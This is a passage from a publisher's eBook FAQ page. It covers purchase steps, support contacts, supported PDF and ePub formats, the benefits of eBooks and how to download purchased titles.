  3. Select the title you want to purchase.
  4. Choose the format you wish to purchase the title in; if you order the Print Book, you get a free eBook copy of the same title. 
  5. Proceed with the checkout process (payment to be made using Credit Card, Debit Cart, or PayPal)
Where can I access support around an eBook? Chevron down icon Chevron up icon
  • If you experience a problem with using or installing Adobe Reader, the contact Adobe directly.
  • To view the errata for the book, see www.packtpub.com/support and view the pages for the title you have.
  • To view your account details or to download a new copy of the book go to www.packtpub.com/account
  • To contact us directly if a problem is not resolved, use www.packtpub.com/contact-us
What eBook formats do Packt support? Chevron down icon Chevron up icon

Our eBooks are currently available in a variety of formats such as PDF and ePubs. In the future, this may well change with trends and development in technology, but please note that our PDFs are not Adobe eBook Reader format, which has greater restrictions on security.

You will need to use Adobe Reader v9 or later in order to read Packt's PDF eBooks.

What are the benefits of eBooks? Chevron down icon Chevron up icon
  • You can get the information you need immediately
  • You can easily take them with you on a laptop
  • You can download them an unlimited number of times
  • You can print them out
  • They are copy-paste enabled
  • They are searchable
  • There is no password protection
  • They are lower price than print
  • They save resources and space
What is an eBook? Chevron down icon Chevron up icon

Packt eBooks are a complete electronic version of the print edition, available in PDF and ePub formats. Every piece of content down to the page numbering is the same. Because we save the costs of printing and shipping the book to you, we are able to offer eBooks at a lower cost than print editions.

When you have purchased an eBook, simply login to your account and click on the link in Your Download Area. We recommend you saving the file to your hard drive before opening it.

For optimal viewing of our eBooks, we recommend you download and install the free Adobe Reader version 9.